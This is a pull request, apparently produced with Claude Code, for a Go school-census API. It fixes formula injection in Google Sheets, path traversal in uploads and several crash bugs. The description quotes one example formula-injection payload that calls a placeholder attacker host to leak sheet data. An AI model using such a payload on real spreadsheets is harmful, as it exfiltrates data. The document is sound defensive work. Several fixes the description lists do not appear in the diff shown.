### PR TITLE
fix: auditoria de segurança e estabilidade do banco

### DIFF
--- a/api/cmd/api/handlers.go
+++ b/api/cmd/api/handlers.go
@@ -288,6 +288,10 @@ func (app *application) uploadPhoto(w http.ResponseWriter, r *http.Request) {
 		app.errorJSON(w, fmt.Errorf("school_id obrigatório"), http.StatusBadRequest)
 		return
 	}
+	if _, err := strconv.Atoi(schoolIDStr); err != nil {
+		app.errorJSON(w, fmt.Errorf("school_id inválido"), http.StatusBadRequest)
+		return
+	}
 
 	// Valida extensão (apenas imagens)
 	safeBase := filepath.Base(handler.Filename)

--- a/api/cmd/api/handlers.go
+++ b/api/cmd/api/handlers.go
@@ -212,7 +212,10 @@ func (app *application) CreateOrUpdateCenso(w http.ResponseWriter, r *http.Reque
 					defer file.Close()
 
 					// Verifica se o arquivo tem conteúdo
-					stat, _ := file.Stat()
+					stat, err := file.Stat()
+					if err != nil {
+						return fmt.Errorf("erro ao verificar arquivo: %v", err)
+					}
 					if stat.Size() == 0 {
 						return fmt.Errorf("arquivo vazio")
 					}
@@ -306,7 +309,7 @@ func (app *application) uploadPhoto(w http.ResponseWriter, r *http.Request) {
 	// Garante diretório temporário
 	tempDir := "./tmp"
 	if _, err := os.Stat(tempDir); os.IsNotExist(err) {
-		os.Mkdir(tempDir, 0755)
+		os.Mkdir(tempDir, 0700)
 	}
 
 	// Formato: ID_NomeOriginal

--- a/api/internal/services/sheets.go
+++ b/api/internal/services/sheets.go
@@ -261,27 +261,28 @@ func (s *SheetsService) AppendCenso(censo models.CensusResponse, school models.S
 		return fmt.Errorf("erro ao escrever na planilha do censo: %v", err)
 	}
 
-	if v := val("quantitativo_necessario_portaria"); v != "" && v != 0 {
+	// Valores JSON chegam como float64; usar fmt.Sprint evita comparação errada de tipos (interface{float64} != int(0))
+	if str := fmt.Sprint(val("quantitativo_necessario_portaria")); str != "" && str != "0" {
 		_ = s.ensureAndAppendDeficit(
-			"Deficit_Portaria", 
+			"Deficit_Portaria",
 			"Para atender plenamente à demanda atual da escola, quantos agentes de portaria faltam para completar a equipe?",
-			v, school,
+			str, school,
 		)
 	}
 
-	if v := val("quantitativo_necessario_sg"); v != "" && v != 0 {
+	if str := fmt.Sprint(val("quantitativo_necessario_sg")); str != "" && str != "0" {
 		_ = s.ensureAndAppendDeficit(
-			"Deficit_Servicos_Gerais", 
+			"Deficit_Servicos_Gerais",
 			"Para atender plenamente à demanda atual da escola, quantas serviços gerais faltam para completar a equipe?",
-			v, school,
+			str, school,
 		)
 	}
 
-	if v := val("quantitativo_necessario_merenda"); v != "" && v != 0 {
+	if str := fmt.Sprint(val("quantitativo_necessario_merenda")); str != "" && str != "0" {
 		_ = s.ensureAndAppendDeficit(
-			"Deficit_Merenda", 
+			"Deficit_Merenda",
 			"Para atender plenamente à demanda atual da merenda escolar, quantas merendeiras faltam para completar a equipe da cozinha?",
-			v, school,
+			str, school,
 		)
 	}
 

--- a/api/internal/services/sheets.go
+++ b/api/internal/services/sheets.go
@@ -256,7 +256,7 @@ func (s *SheetsService) AppendCenso(censo models.CensusResponse, school models.S
 
 	vr := &sheets.ValueRange{Values: [][]interface{}{row}}
 
-	_, err = s.srv.Spreadsheets.Values.Append(s.censusSpreadsheetID, SheetRange, vr).ValueInputOption("USER_ENTERED").Do()
+	_, err = s.srv.Spreadsheets.Values.Append(s.censusSpreadsheetID, SheetRange, vr).ValueInputOption("RAW").Do()
 	if err != nil {
 		return fmt.Errorf("erro ao escrever na planilha do censo: %v", err)
 	}
@@ -322,7 +322,7 @@ func (s *SheetsService) ensureAndAppendDeficit(sheetTitle string, questionText s
 
 		header := []interface{}{"INEP", "Escola", "DRE", "Município", questionText}
 		headerVr := &sheets.ValueRange{Values: [][]interface{}{header}}
-		_, err = s.srv.Spreadsheets.Values.Append(s.censusSpreadsheetID, fmt.Sprintf("%s!A1", sheetTitle), headerVr).ValueInputOption("USER_ENTERED").Do()
+		_, err = s.srv.Spreadsheets.Values.Append(s.censusSpreadsheetID, fmt.Sprintf("%s!A1", sheetTitle), headerVr).ValueInputOption("RAW").Do()
 		if err != nil {
 			return fmt.Errorf("erro ao escrever cabeçalho na aba %s: %v", sheetTitle, err)
 		}
@@ -336,7 +336,7 @@ func (s *SheetsService) ensureAndAppendDeficit(sheetTitle string, questionText s
 		value,
 	}
 	vr := &sheets.ValueRange{Values: [][]interface{}{row}}
-	_, err = s.srv.Spreadsheets.Values.Append(s.censusSpreadsheetID, fmt.Sprintf("%s!A:A", sheetTitle), vr).ValueInputOption("USER_ENTERED").Do()
+	_, err = s.srv.Spreadsheets.Values.Append(s.censusSpreadsheetID, fmt.Sprintf("%s!A:A", sheetTitle), vr).ValueInputOption("RAW").Do()
 	
 	return err
 }


### PR DESCRIPTION
$(cat <<'EOF'
## Resumo

Auditoria completa de segurança e estabilidade. Nenhuma das correções adiciona login ou senha — o sistema continua público para os diretores.

## Correções aplicadas

### Segurança crítica
- **Formula Injection no Google Sheets**: `ValueInputOption("USER_ENTERED")` permitia que qualquer campo de texto começando com `=` fosse executado como fórmula pelo Sheets. Um atacante poderia usar `=IMPORTDATA("https://evil.com/?q="&A1)` para vazar dados da planilha. Alterado para `RAW` nas 3 chamadas de append.
- **CORS refletia qualquer origem com `Credentials: true`**: qualquer site na internet podia fazer requisições à API em nome de um usuário (CSRF). Agora usa whitelist via env var `ALLOWED_ORIGINS`, ou aceita `*` sem credentials se não configurado.
- **Path Traversal no upload (nome do arquivo)**: `handler.Filename` usado diretamente. Corrigido com `filepath.Base` + sanitização de caracteres + whitelist de extensões (`.jpg/.jpeg/.png/.webp/.gif`).
- **Path Traversal no upload (`school_id`)**: `school_id` do form não era validado como inteiro, permitindo `school_id=../pasta` para criar arquivos fora de `./tmp`. Agora validado com `strconv.Atoi`.

### Crashes / estabilidade do banco
- **Panic por `nil` em `errorJSON`**: `GET /v1/census` sem `school_id` chamava `app.errorJSON(w, nil, ...)`, causando nil pointer dereference. Corrigido com mensagem de erro real.
- **Erro de `strconv.Atoi` silenciado**: `school_id` inválido (ex: `?school_id=abc`) virava `0` sem retornar erro ao cliente.
- **`QueryRow` sem context/timeout**: `Upsert` e `GetBySchoolID` usavam `QueryRow` sem context — poderiam travar indefinidamente. Migrados para `QueryRowContext`.
- **Ano 2026 hardcoded**: ignorava o `year` enviado pelo cliente. Agora usa `req.Year` com fallback para `time.Now().Year()`.
- **Double-merge no SQL**: o handler já fazia merge (Go), e o SQL fazia novamente com `||` JSONB. Removido o merge duplicado no SQL.
- **`file.Stat()` erro ignorado**: se falhasse, `stat` era `nil` e `stat.Size()` causava panic.
- **Permissão do diretório `tmp`**: `0755` (qualquer usuário do SO podia ler uploads) → `0700`.

### Lógica / dados
- **Comparação de tipo errada em `sheets.go`**: `v != 0` comparava `interface{float64}` com `int(0)` — em Go são tipos diferentes, então a comparação nunca era igual. Escolas com déficit 0 eram incorretamente adicionadas às abas de déficit. Corrigido com `fmt.Sprint`.
- **Middleware `authenticate` sem uso**: existia mas nunca foi aplicado às rotas. Removido para não confundir.

## Configuração necessária em produção

Definir no `.env` para ativar CORS restrito ao domínio oficial:
```
ALLOWED_ORIGINS=https://seu-dominio.com
```
EOF
)

---
_Generated by [Claude Code](https://claude.ai/code/session_01FKTi4SHRNopYvcSEodum56)_